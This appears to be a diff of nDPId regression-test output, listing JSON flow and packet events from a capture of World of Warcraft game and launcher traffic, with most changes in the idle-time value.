-00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"wow.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437858849489,"flow_last_seen":1437858849489,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437858849489,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.153","src_port":39364,"dst_port":3724,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"wow.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1437858849489,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858849489,"pkt":"JGUR0Ik6JGURQGHhCABFAAA8GWRAAIAGfYDAqLIUDIHkmZnEDowRX7J7AAAAAKACIABfQAAAAgQFtAEDAwIEAggKACn4mAAAAAA="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"wow.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1437858849489,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858849489,"pkt":"JGUR0Ik6JGURQGHhCABFAAA8GWRAAIAGfYDAqLIUDIHkmZnEDowRX7J7AAAAAKACIABfQAAAAgQFtAEDAwIEAggKACn4mAAAAAA="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"wow.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1437858849702,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858849702,"pkt":"JGURQGHhJGUR0Ik6CABFAAA8AABAADMG4+QMgeSZwKiyFA6MmcRkqiOyEV+yfKASOJAOpgAAAgQFhAQCCApCum0NACn4mAEDAwc="} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"wow.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437858849489,"flow_last_seen":1437858849924,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1437858849924,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.153","src_port":39364,"dst_port":3724,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WorldOfWarcraft","breed":"Fun","category":"Game"}} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"wow.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437858769436,"flow_last_seen":1437858769436,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437858769436,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.222.53","src_port":39309,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"wow.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1437858769436,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858769436,"pkt":"JGUR0Ik6JGURQGHhCABFAAA8GJNAAIAGhLXAqLIUDIHeNZmNAFBo+hN9AAAAAKACIADawAAAAgQFtAEDAwIEAggKACnZUgAAAAA="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"wow.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1437858769437,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858769437,"pkt":"JGUR0Ik6JGURQGHhCABFAAA8GJNAAIAGhLXAqLIUDIHeNZmNAFBo+hN9AAAAAKACIADawAAAAgQFtAEDAwIEAggKACnZUgAAAAA="} +00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"wow.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437858769451,"flow_last_seen":1437858769451,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437858769451,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"24.105.29.21","src_port":39312,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"wow.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1437858769451,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858769451,"pkt":"JGUR0Ik6JGURQGHhCABFAAA8GJRAAIAGOe3AqLIUGGkdFZmQAFAEh98cAAAAAKACIAAoyAAAAgQFtAEDAwIEAggKACnZVAAAAAA="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"wow.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1437858769452,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858769452,"pkt":"JGUR0Ik6JGURQGHhCABFAAA8GJRAAIAGOe3AqLIUGGkdFZmQAFAEh98cAAAAAKACIAAoyAAAAgQFtAEDAwIEAggKACnZVAAAAAA="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"wow.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1437858769649,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858769649,"pkt":"JGURQGHhJGUR0Ik6CABFAAA8AABAADMG6kgMgd41wKiyFABQmY301K7baPoTfqASFqCzawAAAgQFhAQCCAqn1+VGACnZUgEDAwc="} +00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"wow.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437858769436,"flow_last_seen":1437858769651,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1437858769651,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.222.53","src_port":39309,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.WorldOfWarcraft","breed":"Fun","category":"Game"},"http": {"hostname":"us.scan.worldofwarcraft.com","url":"us.scan.worldofwarcraft.com\/update\/Launcher.txt","code":0,"content_type":"","user_agent":""}} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"wow.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1437858769673,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1437858769673,"pkt":"JGURQGHhJGUR0Ik6CABFAAAwGJRAAHEGSPkYaR0VwKiyFABQmZCXtfydBIffHXASIACqLAAAAgQFhAQCAAA="} +00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"wow.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437858769451,"flow_last_seen":1437858769820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1437858769820,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"24.105.29.21","src_port":39312,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.WorldOfWarcraft","breed":"Fun","category":"Game"},"http": {"hostname":"launcher.worldofwarcraft.com","url":"launcher.worldofwarcraft.com\/alert","code":0,"content_type":"","user_agent":""}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"wow.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437858780584,"flow_last_seen":1437858780584,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437858780584,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.153","src_port":39329,"dst_port":3724,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"wow.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1437858780584,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858780584,"pkt":"JGUR0Ik6JGURQGHhCABFAAA8GOFAAIAGfgPAqLIUDIHkmZmhDoyszXMNAAAAAKACIAAeTgAAAgQFtAEDAwIEAggKACndrQAAAAA="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"wow.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1437858780584,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858780584,"pkt":"JGUR0Ik6JGURQGHhCABFAAA8GOFAAIAGfgPAqLIUDIHkmZmhDoyszXMNAAAAAKACIAAeTgAAAgQFtAEDAwIEAggKACndrQAAAAA="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"wow.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1437858780796,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858780796,"pkt":"JGURQGHhJGUR0Ik6CABFAAA8AABAADMG4+QMgeSZwKiyFA6MmaEZw7OGrM1zDqASOJCV8gAAAgQFhAQCCApCuV\/iACndrQEDAwc="} +00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"wow.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437858780584,"flow_last_seen":1437858781018,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1437858781018,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.153","src_port":39329,"dst_port":3724,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WorldOfWarcraft","breed":"Fun","category":"Game"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"wow.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437858849489,"flow_last_seen":1437858849489,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437858849489,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.153","src_port":39364,"dst_port":3724,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"wow.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1437858849489,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858849489,"pkt":"JGUR0Ik6JGURQGHhCABFAAA8GWRAAIAGfYDAqLIUDIHkmZnEDowRX7J7AAAAAKACIABfQAAAAgQFtAEDAwIEAggKACn4mAAAAAA="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"wow.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1437858849489,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858849489,"pkt":"JGUR0Ik6JGURQGHhCABFAAA8GWRAAIAGfYDAqLIUDIHkmZnEDowRX7J7AAAAAKACIABfQAAAAgQFtAEDAwIEAggKACn4mAAAAAA="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"wow.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1437858849702,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437858849702,"pkt":"JGURQGHhJGUR0Ik6CABFAAA8AABAADMG4+QMgeSZwKiyFA6MmcRkqiOyEV+yfKASOJAOpgAAAgQFhAQCCApCum0NACn4mAEDAwc="} +00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"wow.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437858849489,"flow_last_seen":1437858849924,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1437858849924,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.153","src_port":39364,"dst_port":3724,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WorldOfWarcraft","breed":"Fun","category":"Game"}} 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":83,"source":"wow.pcap","alias":"nDPId-test","packets-captured":83,"packets-processed":82,"total-skipped-flows":0,"total-l4-data-len":4309,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":4,"total-active-flows":4,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":23,"global_ts_msec":1437859397750} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"wow.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437859397750,"flow_last_seen":1437859397750,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437859397750,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.152","src_port":39593,"dst_port":3724,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"wow.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1437859397750,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437859397750,"pkt":"JGUR0Ik6JGURQGHhCABFAAA8KdNAAIAGbRLAqLIUDIHkmJqpDoyvdi+RAAAAAKACIABtBAAAAgQFtAEDAwIEAggKACrOwgAAAAA="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"wow.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1437859397750,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437859397750,"pkt":"JGUR0Ik6JGURQGHhCABFAAA8KdNAAIAGbRLAqLIUDIHkmJqpDoyvdi+RAAAAAKACIABtBAAAAgQFtAEDAwIEAggKACrOwgAAAAA="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"wow.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1437859397966,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437859397966,"pkt":"JGURQGHhJGUR0Ik6CABFAAA8AABAADMG4+UMgeSYwKiyFA6Mmqlj7+ucr3YvkqASOJA2KQAAAgQFhAQCCApCwowWACrOwgEDAwc="} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"wow.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437859397750,"flow_last_seen":1437859398184,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1437859398184,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.152","src_port":39593,"dst_port":3724,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WorldOfWarcraft","breed":"Fun","category":"Game"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":95,"source":"wow.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1437858780584,"flow_last_seen":1437858782413,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":503,"flow_tot_l4_payload_len":2606,"flow_avg_l4_payload_len":162,"midstream":0,"thread_ts_msec":1437859398661,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.153","src_port":39329,"dst_port":3724,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WorldOfWarcraft","breed":"Fun","category":"Game"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":95,"source":"wow.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1437858849489,"flow_last_seen":1437858850365,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1437859398661,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.153","src_port":39364,"dst_port":3724,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WorldOfWarcraft","breed":"Fun","category":"Game"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":95,"source":"wow.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1437859397750,"flow_last_seen":1437859398661,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":1437859398661,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.152","src_port":39593,"dst_port":3724,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WorldOfWarcraft","breed":"Fun","category":"Game"}} -00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":95,"source":"wow.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1437858769436,"flow_last_seen":1437858780442,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1437859398661,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.222.53","src_port":39309,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.WorldOfWarcraft","breed":"Fun","category":"Game"}} -00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":95,"source":"wow.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1437858769451,"flow_last_seen":1437858780577,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":544,"flow_tot_l4_payload_len":688,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1437859398661,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"24.105.29.21","src_port":39312,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.WorldOfWarcraft","breed":"Fun","category":"Game"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"wow.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437859397750,"flow_last_seen":1437859397750,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437859397750,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.152","src_port":39593,"dst_port":3724,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"wow.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1437859397750,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437859397750,"pkt":"JGUR0Ik6JGURQGHhCABFAAA8KdNAAIAGbRLAqLIUDIHkmJqpDoyvdi+RAAAAAKACIABtBAAAAgQFtAEDAwIEAggKACrOwgAAAAA="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"wow.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1437859397750,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437859397750,"pkt":"JGUR0Ik6JGURQGHhCABFAAA8KdNAAIAGbRLAqLIUDIHkmJqpDoyvdi+RAAAAAKACIABtBAAAAgQFtAEDAwIEAggKACrOwgAAAAA="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"wow.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1437859397966,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1437859397966,"pkt":"JGURQGHhJGUR0Ik6CABFAAA8AABAADMG4+UMgeSYwKiyFA6Mmqlj7+ucr3YvkqASOJA2KQAAAgQFhAQCCApCwowWACrOwgEDAwc="} +00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"wow.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437859397750,"flow_last_seen":1437859398184,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1437859398184,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.152","src_port":39593,"dst_port":3724,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WorldOfWarcraft","breed":"Fun","category":"Game"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":95,"source":"wow.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1437858780584,"flow_last_seen":1437858782413,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":503,"flow_tot_l4_payload_len":2606,"flow_avg_l4_payload_len":162,"midstream":0,"thread_ts_msec":1437859398661,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.153","src_port":39329,"dst_port":3724,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WorldOfWarcraft","breed":"Fun","category":"Game"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":95,"source":"wow.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1437858849489,"flow_last_seen":1437858850365,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1437859398661,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.153","src_port":39364,"dst_port":3724,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WorldOfWarcraft","breed":"Fun","category":"Game"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":95,"source":"wow.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1437859397750,"flow_last_seen":1437859398661,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":1437859398661,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.228.152","src_port":39593,"dst_port":3724,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WorldOfWarcraft","breed":"Fun","category":"Game"}} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":95,"source":"wow.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1437858769436,"flow_last_seen":1437858780442,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1437859398661,"l3_proto":"ip4","src_ip":"192.168.178.20","dst_ip":"12.129.222.53","src_port":39309,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.WorldOfWarcraft","breed":"Fun","category":"Game"}} 